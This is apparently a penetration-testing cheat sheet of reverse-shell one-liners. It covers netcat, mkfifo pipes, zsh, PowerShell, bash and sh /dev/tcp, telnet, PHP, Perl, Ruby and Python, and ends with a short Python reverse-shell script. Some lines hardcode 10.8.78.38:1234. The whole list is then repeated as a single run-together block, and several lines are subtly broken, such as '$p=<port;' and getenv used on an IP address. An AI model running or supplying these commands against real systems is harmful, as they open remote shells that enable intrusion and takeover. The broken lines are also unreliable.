Common One liners


// Using netcat
nc <attacker_ip> <port> -e /bin/bash

// without NetCAT
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.78.38 1234 >/tmp/f


// Using Zsh 
zsh -c 'zmodload zsh/net/tcp && ztcp 10.8.78.38 1234 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'

// Using Powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.8.78.38',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"




// Using bash and TCP sockets
/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1


// Using sh and TCP sockets
0<&196;exec 196<>/dev/tcp/<attacker_ip>/<port>; sh <&196 >&196 2>&196


// Using telnet
telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>
TF=$(mktemp -u); mkfifo $TF && telnet 10.8.78.38 1234 0<$TF | /bin sh 1>$TF


// PHP and sh
php -r '$sock=fsockopen("<attacker_ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen(getenv("10.8.78.38"),getenv("1234"));exec("/bin/sh -i <&3 >&3 2>&3");'


// Perl and sh
perl -e 'use Socket;$i="<attacker_ip>";$p=<port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -e 'use Socket;$i="$ENV{10.8.78.38}";$p=$ENV{1234};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


// Perl forking:
$ perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'


// Ruby 
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["10.8.78.38"],ENV["1234"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'


// Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.78.38",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'


// Reverse shell with python script:
#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("IP",port))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

PreviousScripting Languages NextActive Directory

Last updated 2 years ago

// Using netcat nc <attacker_ip> <port> -e /bin/bash // without NetCAT rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.78.38 1234 >/tmp/f // Using Zsh zsh -c 'zmodload zsh/net/tcp && ztcp 10.8.78.38 1234 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' // Using Powershell powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.8.78.38',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" // Using bash and TCP sockets /bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1 // Using sh and TCP sockets 0<&196;exec 196<>/dev/tcp/<attacker_ip>/<port>; sh <&196 >&196 2>&196 // Using telnet telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port> TF=$(mktemp -u); mkfifo $TF && telnet 10.8.78.38 1234 0<$TF | /bin sh 1>$TF // PHP and sh php -r '$sock=fsockopen("<attacker_ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen(getenv("10.8.78.38"),getenv("1234"));exec("/bin/sh -i <&3 >&3 2>&3");' // Perl and sh perl -e 'use Socket;$i="<attacker_ip>";$p=<port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -e 'use Socket;$i="$ENV{10.8.78.38}";$p=$ENV{1234};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' // Perl forking: $ perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' // Ruby ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["10.8.78.38"],ENV["1234"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' // Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.78.38",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' // Reverse shell with python script: #!/usr/bin/python import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("IP",port)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])